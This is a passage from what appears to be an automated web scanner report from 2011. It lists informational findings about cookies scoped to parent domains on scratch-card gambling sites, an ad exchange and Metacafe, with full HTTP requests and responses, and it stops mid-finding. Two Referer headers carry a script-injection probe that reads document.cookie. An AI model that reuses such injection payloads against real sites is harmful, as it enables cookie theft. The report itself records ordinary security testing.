P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Location: pbl.asp
Content-Length: 128
Content-Type: text/html
Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQQACDBBC=JOFLNHKAJGJGGOBMPFBILGBN; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>

11.73. http://sv.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sv.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_12=EncryptedUniqueVisitorID=92AFF744A8C1ACECECBEB1CBE42B4786&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:03:33 GMT; path=/
UniqueVisitorID=92AFF744A8C1ACECECBEB1CBE42B4786; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: sv.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=tozxwiay5gsnm045qnofca45; path=/; HttpOnly
Set-Cookie: LanguageCode=SWE; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=92AFF744A8C1ACECECBEB1CBE42B4786&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:03:33 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: UniqueVisitorID=92AFF744A8C1ACECECBEB1CBE42B4786; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.74. http://sv.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sv.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_27=EncryptedUniqueVisitorID=9F2E93BD550A418B6C8B77D320264753&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:12 GMT; path=/
UniqueVisitorID=9F2E93BD550A418B6C8B77D320264753; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: sv.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=azgunk45evet2e2lc4weniil; path=/; HttpOnly
Set-Cookie: LanguageCode=SWE; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=9F2E93BD550A418B6C8B77D320264753&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:12 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/
Set-Cookie: UniqueVisitorID=9F2E93BD550A418B6C8B77D320264753; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.75. http://sv.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sv.scratch2cash.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_1=EncryptedUniqueVisitorID=2F88B34160D1FB90561B679A38A912E9&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:31:53 GMT; path=/
UniqueVisitorID=2F88B34160D1FB90561B679A38A912E9; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: sv.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fndj2f45vfptvambh31xbrbd; path=/; HttpOnly
Set-Cookie: LanguageCode=SWE; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=2F88B34160D1FB90561B679A38A912E9&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:31:53 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/
Set-Cookie: UniqueVisitorID=2F88B34160D1FB90561B679A38A912E9; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.76. http://sv.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sv.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_8=EncryptedUniqueVisitorID=3B851E3B1D951D14376C41FE99F407D8&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:13:10 GMT; path=/
UniqueVisitorID=3B851E3B1D951D14376C41FE99F407D8; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: sv.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:13:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gwthtzz40d422xm4dak1bp45; path=/; HttpOnly
Set-Cookie: LanguageCode=SWE; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=3B851E3B1D951D14376C41FE99F407D8&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:13:10 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/
Set-Cookie: UniqueVisitorID=3B851E3B1D951D14376C41FE99F407D8; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.77. http://va.px.invitemedia.com/goog_imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://va.px.invitemedia.com
Path:	/goog_imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"371390\": [1305550329+ \"TdEd9gAO8M4K5TsGkp5xaw==\"+ 64259+ 25503+ 517]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
camp_freq_p1=eJzjkuF4sZNZgFHi5+4j71gUGDV+3jv5jsWA0QLM5xLhePWZRYBJYu+NlUBZBg0GAwYLBgAi8hMl; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI3M119; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
io_freq_p1="eJzjEuZY4iTAKPFz95F3LAaMFmCaS5jjeKAAk8TeGyvfsSgwaDAYMFgwAAA8/Q25"; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goog_imp?returnType=image&key=AdImp&cost=TdEd9gAO8M4K5TsGkp5xaxwSSvDKE_7Qi7O2DA&ex_uid=4_CAESELxIVtdmt3dKafs3FT8t4Q0&creativeID=76103&message=eJyrVjI2VrJSMDI1NTDWUVAyNgJyjM0NjS0NgDxDIEcpJMU1xTLd0d_C18TbNKTYPbvAtCKx3NZWCaQcpKA0LzsvvzwPxAfpNgHSpkDa1NAcyDIBsvJKc3KATDMg08zEyNSyFgAoiRsT&managed=false HTTP/1.1
Host: va.px.invitemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg;pos=rect2;sz=300x300,300x250;atf=no;name=300x250btf;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=8;ord=4284276430058379
Cookie: segments_p1="eJzjYuFo2czIxcIx5y0jFxfHnn3MAv82n3vHwsXM8S8cAHevCXM="; uid=2ecd6c1e-5306-444b-942d-9108b17fd086; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI2N119; subID="{}"; impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; camp_freq_p1=eJzjkuF49ZlFgEli742V71gUmDT2PwHSBkwW268BaQCvyAyE; io_freq_p1="eJzjkuY4HijAJLH3xsp3LAqMGj9BtAGTxfZrQBoAnC8L5w=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 12:52:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 16-May-2011 12:51:49 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
Set-Cookie: impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"371390\": [1305550329+ \"TdEd9gAO8M4K5TsGkp5xaw==\"+ 64259+ 25503+ 517]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
Set-Cookie: camp_freq_p1=eJzjkuF4sZNZgFHi5+4j71gUGDV+3jv5jsWA0QLM5xLhePWZRYBJYu+NlUBZBg0GAwYLBgAi8hMl; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
Set-Cookie: exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI3M119; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjEuZY4iTAKPFz95F3LAaMFmCaS5jjeKAAk8TeGyvfsSgwaDAYMFgwAAA8/Q25"; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

11.78. http://winter.metacafe.com/Openx/www/delivery/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://winter.metacafe.com
Path:	/Openx/www/delivery/lg.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

OAID=c28c03f15174f432a7be750cb01c8ecd; expires=Tue, 15-May-2012 12:49:29 GMT; path=/; domain=.metacafe.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Openx/www/delivery/lg.php?bannerid=10601&campaignid=5097&zoneid=263&source=;number-0;ff-on;LEID-40;pageType-home;sessions-1;header-http://www.metacafe.com;metacafe.com;playerType-Portal;public-no;userStatus=Anonymous&loc=1&referer=http%3A%2F%2Fwww.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1&cb=e9bcf54a47 HTTP/1.1
Host: winter.metacafe.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7ba2c139c5c43d415b4eb00c8050858e; OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; OAID=c28c03f15174f432a7be750cb01c8ecd; User=%7B%22sc%22%3A1%2C%22visitID%22%3A%2289a4d803e9538a86501013a4c90d08fa%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22ffilter%22%3Atrue%2C%22pve%22%3A1%2C%22fbconnected%22%3Afalse%7D

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:29 GMT
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=c28c03f15174f432a7be750cb01c8ecd; expires=Tue, 15-May-2012 12:49:29 GMT; path=/; domain=.metacafe.com
Content-Length: 43
Vary: Accept-Encoding,User-Agent
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.79. http://www.bigmoneyscratch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_12=EncryptedUniqueVisitorID=A33BADF2D03C7B4113BECB861AAA8512&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 11:41:39 GMT; path=/
UniqueVisitorID=A33BADF2D03C7B4113BECB861AAA8512; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bigmoneyscratch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:39 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=f5jure3lb3c4ja5502em2o55; path=/; HttpOnly
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=A33BADF2D03C7B4113BECB861AAA8512&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 11:41:39 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: UniqueVisitorID=A33BADF2D03C7B4113BECB861AAA8512; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Vary: Accept-Encoding
Content-Length: 47633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.80. http://www.bigmoneyscratch.com/AboutUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/AboutUs.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:56 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:56 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:56 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:56 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.81. http://www.bigmoneyscratch.com/Affiliates.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Affiliates.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.82. http://www.bigmoneyscratch.com/ContactUsChat.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/ContactUsChat.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsChat.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:48 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:48 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:48 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.83. http://www.bigmoneyscratch.com/ContactUsFax.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/ContactUsFax.aspx

Issue detail

